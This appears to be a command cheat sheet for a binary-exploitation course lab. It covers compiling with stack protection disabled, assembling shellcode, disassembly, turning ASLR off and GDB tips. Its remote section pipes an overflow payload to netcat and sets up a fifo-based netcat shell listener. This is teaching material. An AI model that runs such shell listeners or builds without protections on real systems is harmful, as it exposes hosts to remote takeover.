Useful Commands Reference

Compilation, Assembly, and Linking

Compile C file (32 bit executable):


$ gcc foo.c -o foo                      # 32-bit
$ gcc -m32 foo.c -o foo                 # 64-bit
$ gcc -m32 -B /home/mids/m164122/libc   # Michelson Labs

Compile C file (32 bit executable, security features disabled):


$ gcc -fno-stack-protector -z execstack foo.c -o foo                      # 32-bit
$ gcc -fno-stack-protector -z execstack -m32 foo.c -o foo                 # 64-bit
$ gcc -fno-stack-protector -z execstack -m32 -B /home/mids/m164122/libc   # Michelson Labs

Assemble file (shellcode to flat binary):


$ nasm foo.asm -o foo

Assemble file (assembly program to ELF object file):


$ nasm foo.asm -o foo.o -felf

Link assembly code (32 bit, using C runtime, e.g. main):


$ gcc foo.o -o foo                                    # 32 bit machine
$ gcc -m32 foo.o -o foo                               # 64 bit machine
$ gcc -m32 -B /home/mids/m164122/libc foo.o -o foo    # Michelson Labs

Link assembly code (using system calls, e.g. _start):


$ ld foo.o -o foo

Disassembly/Reverse Engineering

Disassemble binary (ELF):


$ objdump -d -Mintel foo > foo.asm

Disassemble binary (flat binary):


$ objdump -bbinary -mi386 -Mintel -D foo > foo.asm

Show contents of binary, with load addresses:


$ objdump -s foo > foo.data

Check if the stack is executable:


$ readelf -l foo       # Look at the flags field of the GNU_STACK header

Check executable section locations/permissions:


$ readelf -S foo

Run program without ASLR (32 bit):


$ setarch linux32 -R ./foo       # Run foo with ASLR off
$ setarch linux32 -R /bin/bash   # Run a shell, no ASLR for child progs

GDB Commands

Set intel syntax:


(gdb) set disassembly-flavor intel

Debug child processes (useful for debugging server processes):


(gdb) set follow-fork-mode child

Show current instruction after each command:


(gdb) display/i $pc

Step through a nop sled:


(gdb) while *((unsigned char*)$eip) == 0x90
> nexti
> end

Remote Exploitation

Send a payload:


$ python -c 'print "A"*1024' | nc 127.0.0.1 1337

Make fifo (special file, FIFO queue):


$ mkfifo fifo

Use a fifo to simulate a netcat shell listener (when nc -e is unsupported):


$ /bin/sh -i < fifo 2>&1 | nc -l 1337 > fifo